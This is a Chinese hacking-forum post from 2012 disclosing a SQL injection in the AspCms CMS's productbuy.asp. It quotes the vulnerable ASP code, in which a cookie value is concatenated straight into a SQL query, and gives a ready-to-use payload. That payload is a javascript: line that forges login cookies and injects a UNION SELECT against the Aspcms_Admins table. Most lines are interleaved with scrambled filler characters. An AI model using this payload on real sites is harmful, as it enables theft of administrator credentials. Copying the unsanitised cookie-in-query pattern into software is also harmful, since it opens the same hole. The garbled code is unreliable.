好久没上土司了,上来一看发现在删号名单内.....
% t+ N0 m) ?+ B2 ?( T也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。) S. ?( V6 S1 A1 `
废话不多说,看代码:# m7 @3 h& s+ s
6 P" G' _3 b& h% P5 ]9 L/ L2 y) ?
<%$ N+ `" k. D# B
8 g# j/ R5 ?/ m6 Y
if action = "buy" then
& I; O! u0 p7 h
2 Y$ u) p( w' B. Z- G addOrder()
1 q8 M$ d: l# ^: N
* u/ L* W1 o E3 E7 Celse
; \: P0 ?3 s2 o/ h: u/ |) m4 m; O) J5 S5 b. P6 s, a8 \
echoContent()
4 o1 h4 M7 P* E+ j/ e
y" Z8 K9 p5 f4 \end if3 F) [! n {% s6 x! t, @: d$ B
. [" @& c$ ]2 _; d) u7 G
4 _- i! I0 Y9 l0 ^( g: r. N& X7 |+ c) [* f1 F$ N! z
……略过! V P; N7 ]/ V6 K" E7 l( @2 l
8 E6 b- Q) X2 m5 T9 }2 T
/ i! X) S( _5 w. {, {' O
( _& O2 j& y. eSub echoContent()4 A/ k, w5 |5 Y* Q
. ]) ^) w1 S7 q) k+ {& Q, n
dim id( k6 i: ^: Y9 T' i! j Z
, \% D, i' [; k& @ id=getForm("id","get")
- s- ^& @, g) B( f/ m, c0 D7 g f
8 a/ Z: N) k* g7 F f4 j* _1 ]
, w4 e( t4 c& ]3 }% R3 G! ^ if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
" O; i. W; o$ u) v; M$ S
; B5 T" K# Z! N9 B7 l& I : {; n" j- c2 Q, J5 k% Y5 n
0 E/ {0 X: s9 t2 U) i! a dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")# n6 e8 w( k* @/ U* {4 U. Z0 V/ T' y
/ J1 q1 o6 e2 I" d dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct9 k* u' Y8 U' G- |
! \$ h P# D7 k9 L9 W Dim templatePath,tempStr
. a/ K1 H. ]3 w; W" q
" c4 k* v- B; _2 s# U templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"& U+ b# j* k% M+ l
; F C1 S/ L3 c7 V
$ P# P* _. c5 U# P8 q
+ P: S- m% W. x" r' P set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")! j1 t; r$ A2 e4 H. U2 n+ ]
, B# Z6 T1 v; X/ Q selectproduct=rsObj(0)
8 [0 A+ P. ~0 P& A1 R5 s9 I/ v E3 s( @3 r( a
3 k! w X" ?& G( v/ P
7 Y" t) p8 s' S
Dim linkman,gender,phone,mobile,email,qq,address,postcode2 A# r u0 }/ S; z8 y$ A9 W' m
4 `( i4 R) ]/ a; x1 [! ` if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
* ?* L8 `9 ~6 E/ `6 z
1 V4 H. h7 U3 V: k6 M+ ? if rCookie("loginstatus")=1 then
& D( _" `) Y6 r5 _- ?2 B: o
( K& ]- X* C4 Q2 d9 t% ^ set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")6 ?$ S7 o" Y1 `0 o5 \) m9 n4 j
* g' ]4 G a1 @ linkman=rsObj("truename")
3 e% M) I9 ^5 ?, h. d( q
, u1 q* _2 m9 ]7 }5 s, \/ Y gender=rsObj("gender")
! m8 @! }+ m% b2 w W, v! H' O5 x. d3 n _
phone=rsObj("phone")! J0 [0 N" k$ g0 _6 J5 m
- }- F- C* T" e, j( c
mobile=rsObj("mobile")
) m: V: e3 z' W6 Y
# J# ^+ m; G% I; N email=rsObj("email"), b/ ~& d, e* r( w
4 X0 ~. ~4 _# i# \" l* W qq=rsObj("qq")* _" x i2 z: q8 O( ` k$ k6 F
9 s" s2 Z3 d K
address=rsObj("address")6 M7 P7 c+ }" X6 k5 h) e
# A. i; P1 F$ u& \4 I+ X
postcode=rsObj("postcode")) O8 W1 u& F5 g- h9 |
V0 h6 g( u: F: ]- t; ~ else 4 f; P K' u4 a( l
* ~ W4 l( N5 A, \& R- s
gender=1
# P$ m! O% u+ q* t
* ~ l; M. {; ^" `+ s7 V. @" I+ _ end if5 [+ D7 h+ E+ U s
% w8 o: M7 P! f0 U* N: n
rsObj.close()
7 [! S D& v- ]- g$ y( W$ E, A+ c9 g; ^& J5 B( E8 q; k
" C0 I* \/ ~$ k) `- A0 ^' C& E6 U3 C M: y( m# H4 k
with templateObj
8 m g" n% X6 L; b# z( P1 E& x! P5 v* H: }; d* H7 c
.content=loadFile(templatePath) " F; Q4 x6 P% d
* d# [8 `: l5 w; _ .parseHtml()
6 a8 U; B5 x3 E6 s% R- i. |3 g, A4 W) f$ c& D
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)3 I3 j; ?% l- F# B% J( `* b
) H8 k- W2 @5 w6 i .content=replaceStr(.content,"[aspcms:linkman]",linkman) ; Z4 p/ z" T# p S' C" c$ r* Y( I
) {4 M& v2 P _# q/ t a5 D9 _8 N; G .content=replaceStr(.content,"[aspcms:gender]",gender) 0 s$ E( c9 s/ y5 V( \. w
8 K, V V& {4 \$ T3 h7 b .content=replaceStr(.content,"[aspcms:phone]",phone)
4 s/ e2 N9 R4 x) i5 t2 p- h( C6 q) U
9 k- n. g, i* _$ I .content=replaceStr(.content,"[aspcms:mobile]",mobile) * b. f! `, A2 L9 R6 r
- c" o s( V+ Q8 q& y .content=replaceStr(.content,"[aspcms:email]",email) : i5 T3 {2 A8 _, x
4 w4 u0 \. C* c) q" q0 z8 V$ A .content=replaceStr(.content,"[aspcms:qq]",qq)
# e x! {- a; x6 a' z' e! }# S5 f# Z; ^) s- P
.content=replaceStr(.content,"[aspcms:address]",address)
! s6 L# q# Y% [: w, k2 N$ O' a2 Q( V! U8 K3 x e
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
2 f+ h, D! r" o2 x. P* k5 I- k3 P( ` e. L- @
.parseCommon() ! o4 O3 {+ @. d2 G
/ m( x$ i8 A/ U
echo .content % Q! u: B3 t: v. M0 N1 ]
8 a- V( \ k/ b& [) I! E* y, {' g
end with0 Y- @+ {9 V$ n1 b, A% ]
* r' z4 V0 L& P8 e6 c set templateobj =nothing : terminateAllObjects
9 L) [, K% f, U+ `! S
+ p9 t. [7 d# x" q+ r% v7 U* SEnd Sub
# p( K& S1 ?+ @1 C3 Q% B漏洞很明显,没啥好说的# v- T/ G* W# b) H& y& l6 j
poc:% z9 x2 \' d$ P# B" F. _
5 e0 I8 d' F0 t8 \3 yjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子& k: Q$ c" G# }! Z# E
3 D9 T4 C5 O0 i6 r |
发表于 2012-12-27 08:35:05
收藏
支持
反对